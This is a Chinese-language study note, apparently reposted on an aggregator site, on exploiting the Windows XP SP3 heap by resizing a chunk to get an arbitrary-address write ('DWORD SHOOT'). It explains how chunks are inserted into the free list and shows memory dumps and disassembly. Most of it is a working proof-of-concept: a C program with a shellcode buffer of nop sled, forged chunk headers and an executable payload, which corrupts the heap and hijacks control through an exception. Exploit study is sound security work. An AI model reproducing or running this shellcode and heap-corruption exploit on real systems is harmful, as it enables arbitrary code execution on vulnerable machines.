利用chunk重设大小攻击堆
只是筆記························································
堆塊學(xué)習(xí)···
DWORD SHOOT
下面環(huán)境為 ?XP ? sp3 VC6.0 ?RELEASE
#include <windows.h>int main() { HLOCAL h1 = 0, h2 = 0; HANDLE hp; hp = HeapCreate(0,0x1000,0x10000); h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,0x10); return 0; }xp 下面介紹 CHUNK插入鏈表的過程:
執(zhí)行完 HeapCreate 后 ?
開始拆卸鏈表:
接著開始關(guān)鍵部分:
到這里 ?新chunk的插入部分的關(guān)鍵部分也就結(jié)束了··············
總結(jié):
[新chunk->flink] ?= 舊chunk->flink
[新chunk->blink] = 舊chunk->blink
?[ 舊chunk->blink->flink ] = 新chunk
[舊chunk->blink] = 新chunk
?實際上是造成了一個向任意地址寫入固定值得 漏洞 dword shoot
下面是正常情況反映················································
003A0688 ?00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?................
003A0698 ?2D 01 03 00 00 10 00 00?78 01 3A 00 78 01 3A 00??-....x:.x:.
003A06A8 ?00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?................
003A06B8 ?00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?................
003A06C8 ?00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?................
003A06D8 ?00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?................
003A06E8 ?00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?................
003A0698 ?03 00 03 00 8F 01 08 00 00 00 00 00 00 00 00 00 ?..?.........
003A06A8 ?00 00 00 00 00 00 00 00?2A 01 03 00 00 10 00 00??........*....
003A06B8 ?78 01 3A 00 78 01 3A 00?00 00 00 00 00 00 00 00 ?x:.x:.........
003A06C8 ?00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?................
003A06D8 ?00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?................
003A06E8 ?00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?................
在這里構(gòu)造:在第二次分配之前!!!!
[0x003a06b8] ? ? ?= ? 0x003a06eb
[0x003a0638+4] ?= ? 0x0012ffe4
[0x0012ffe4] ? ? ? ?= ?0x003a06b8
[0x003a06eb+4] ?= ? 0x003906b8
003A0688 ?90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ?悙悙悙悙悙悙悙悙
003A0698 ?10 01 10 00 99 99 99 99 EB 06 3A 00 EB 06 3A 00 ?.櫃櫃?:.?:.
003A06A8 ?90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ?悙悙悙悙悙悙悙悙
003A06B8 ?90 90 90 90 90 90 90 90 EB 31 90 90 90 90 90 90 ?悙悙悙悙?悙悙悙
003A06C8 ?90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ?悙悙悙悙悙悙悙悙
003A06D8 ?90 90 90 90 90 90 90 90 90 90 90 11 01 10 00 99 ?悙悙悙悙悙?.
003A06E8 ?99 99 99 8C 06 3A 00 E4 FF 12 00
003A06B8 /EB 06 jmp X003A06C0 003A06BA |3A00 cmp al,byte ptr ds:[eax] 003A06BC |E4 FF in al,0xFF 003A06BE |1200 adc al,byte ptr ds:[eax] 003A06C0 \EB 31 jmp X003A06F3 //而這個的EB 31 是我們故意設(shè)置的跳轉(zhuǎn)
#include <stdio.h> #include <windows.h>char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x10\x01\x10\x00\x99\x99\x99\x99""\xEB\x06\x3a\x00\xEB\x06\x3a\x00""\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\xEB\x31\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x11\x01\x10\x00\x99\x99\x99\x99\x8C\x06\x3a\x00\xb4\xFF\x12\x00""\x90\x90\x90\x90""\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C""\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53""\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B""\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95""\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59""\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A""\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75""\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03""\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB""\x53""\x68\x64\x61\x30\x23""\x68\x23\x50\x61\x6E""\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8"; void main() { HLOCAL h1,h2;HANDLE hp;hp = HeapCreate(0,0x1000,0x10000); // __asm int 3h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);memcpy(h1,shellcode,300);h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);int zero=0;zero=1/zero;printf("%d",zero); }
轉(zhuǎn)載于:https://www.cnblogs.com/zcc1414/p/3982381.html
總結(jié)
以上是生活随笔為你收集整理的利用chunk重设大小攻击堆的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Struts2+Spring传参
- 下一篇: jquery学习之1.20-获取同辈元素